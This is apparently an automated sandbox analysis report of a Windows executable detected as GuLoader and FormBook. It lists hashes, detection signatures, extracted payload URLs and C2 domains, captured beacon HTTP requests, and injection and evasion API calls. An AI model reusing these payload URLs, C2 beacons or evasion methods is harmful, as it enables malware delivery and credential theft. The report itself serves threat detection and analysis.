Windows Analysis Report F63V4i8eZU.exe

Overview

General Information

Sample Name: F63V4i8eZU.exe
Analysis ID: 450884
MD5: 08730cdd286a4c9d46b38bb6545ac311
SHA1: 001bb7b5b8d63e505661d7e4a178d08abe6bbad7
SHA256: cb2a2537987e45c8461d40a0ec6c24215920519257134db91dd1369ff5abf342
Tags: 32exe

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Potentially malicious time measurement code found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: F63V4i8eZU.exe Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}
Multi AV Scanner detection for submitted file
Source: F63V4i8eZU.exe Virustotal: Detection: 10%
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

Compliance:

Uses 32bit PE files
Source: F63V4i8eZU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: Binary string: chkdsk.pdbGCTL source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
Source: Binary string: wntdll.pdbUGP source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: F63V4i8eZU.exe, chkdsk.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 31_2_00C2E442

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.yellow-wink.com/nff/
Source: Malware configuration extractor URLs: https://kinmirai.org/wp-content/bin_QVwo
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1 Host: www.oubacm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1 Host: www.mothererph.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1 Host: www.howtovvbucks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1 Host: www.mikecdmusic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1 Host: www.pacleanfuel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1 Host: www.foeweifgoor73dz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1 Host: www.thehomechef.global Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1 Host: www.yellow-wink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1 Host: www.amazonautomationbusiness.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1 Host: www.ooweesports.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1 Host: www.gentrypartyof8.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1 Host: www.dunn-labs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1 Host: www.tearor.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.50.252.64
Source: Joe Sandbox View IP Address: 212.32.237.90
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR
Source: Joe Sandbox View ASN Name: GOOGLE-2US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: <a href="https://www.facebook.com/InstraCorp" target="_blank" rel="nofollow"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: kinmirai.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 19 Jul 2021 18:23:41 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 0000001D.00000000.448268826.00000000089F9000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp String found in binary or memory: http://farmersschool.ge/bin_QVwEr224.bin
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: http://survey-smiles.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Lato:300
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp String found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.bin
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp String found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllM
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/instra
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://www.instra.com/?utm_medium=free_parking&utm_source=thehomechef.global
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://www.instra.com/en/hosting/web-hosting-packages/?utm_medium=free_parking&utm_source=thehomech
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A88E2 NtProtectVirtualMemory, 0_2_022A88E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A08DC NtWriteVirtualMemory,TerminateProcess, 0_2_022A08DC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E EnumWindows,NtWriteVirtualMemory, 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW, 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A55EC NtAllocateVirtualMemory, 0_2_022A55EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F NtWriteVirtualMemory, 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 NtWriteVirtualMemory, 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 NtWriteVirtualMemory, 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 NtWriteVirtualMemory, 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A48E8 NtWriteVirtualMemory, 0_2_022A48E8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 NtWriteVirtualMemory, 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E NtWriteVirtualMemory, 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 NtWriteVirtualMemory, 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5724 NtAllocateVirtualMemory, 0_2_022A5724
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 NtWriteVirtualMemory, 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4C2B NtWriteVirtualMemory, 0_2_022A4C2B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4C21 NtWriteVirtualMemory, 0_2_022A4C21
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2470 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A2470
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3C4D NtWriteVirtualMemory, 0_2_022A3C4D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4C45 NtWriteVirtualMemory, 0_2_022A4C45
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 NtWriteVirtualMemory, 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4CBE NtWriteVirtualMemory, 0_2_022A4CBE
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4CB4 NtWriteVirtualMemory, 0_2_022A4CB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 NtWriteVirtualMemory, 0_2_022A7488
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4CD8 NtWriteVirtualMemory, 0_2_022A4CD8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4D4C NtWriteVirtualMemory, 0_2_022A4D4C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A20 NtResumeThread,LdrInitializeThunk, 18_2_1E3F9A20
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 18_2_1E3F9A00
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_1E3F9660
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A50 NtCreateFile,LdrInitializeThunk, 18_2_1E3F9A50
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_1E3F96E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9710 NtQueryInformationToken,LdrInitializeThunk, 18_2_1E3F9710
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 18_2_1E3F97A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9780 NtMapViewOfSection,LdrInitializeThunk, 18_2_1E3F9780
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_1E3F9860
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9840 NtDelayExecution,LdrInitializeThunk, 18_2_1E3F9840
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F98F0 NtReadVirtualMemory,LdrInitializeThunk, 18_2_1E3F98F0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_1E3F9910
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9540 NtReadFile,LdrInitializeThunk, 18_2_1E3F9540
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F99A0 NtCreateSection,LdrInitializeThunk, 18_2_1E3F99A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F95D0 NtClose,LdrInitializeThunk, 18_2_1E3F95D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9610 NtEnumerateValueKey, 18_2_1E3F9610
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A10 NtQuerySection, 18_2_1E3F9A10
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9670 NtQueryInformationProcess, 18_2_1E3F9670
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9650 NtQueryValueKey, 18_2_1E3F9650
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A80 NtOpenDirectoryObject, 18_2_1E3F9A80
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F96D0 NtCreateKey, 18_2_1E3F96D0
